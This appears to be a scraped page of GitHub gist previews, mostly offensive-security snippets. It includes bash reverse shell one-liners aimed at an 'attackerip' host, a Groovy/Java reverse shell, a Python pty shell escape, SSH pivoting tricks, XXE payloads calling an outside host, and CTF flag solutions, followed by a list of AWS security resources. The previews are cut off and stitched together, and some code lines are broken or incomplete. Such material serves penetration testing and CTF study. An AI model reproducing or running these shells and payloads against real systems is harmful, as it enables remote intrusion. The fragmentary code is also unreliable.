Author : Cyber Security IPB
Date : October 28, 2016
Dependencies : pwntools
This script can replace function calls in an ELF binary
(32 / 64 bit). For example, changing "call printf" to "call puts"
to patch a format string vulnerability. Or changing a function
call in the program to a call to a different function.
View reverse_shells
bash -i >& /dev/tcp/ 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
waywardsun / ssh_tricks
Created Sep 20, 2016 — forked from sckalath/ssh_tricks
ssh kung fu
View ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on that lets you pivot through the remote host (
#Command line:
ssh -D
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from
waywardsun / tricks
Created Sep 20, 2016 — forked from sckalath/tricks
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
0xBADCA7 /
Created Aug 27, 2016
Async HTTP requests in Python
from concurrent.futures import ThreadPoolExecutor
from requests_futures.sessions import FuturesSession
def outp(response):
urls = [
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
View CTF_Solutions.txt
## Level 1:
View the source, at the top we see:
<!-- infosec_flagis_welcome -->
Level 1 PASS: infosec_flagis_welcome
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
chanj / AWS Security Resources
Last active Jun 21, 2021
AWS Security Resources
View AWS Security Resources
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link:
Official AWS Security Resources
* Security Blog -
* Security Advisories -
* Security Whitepaper (AWS Security Processes/Practices) -
* Security Best Practices Whitepaper -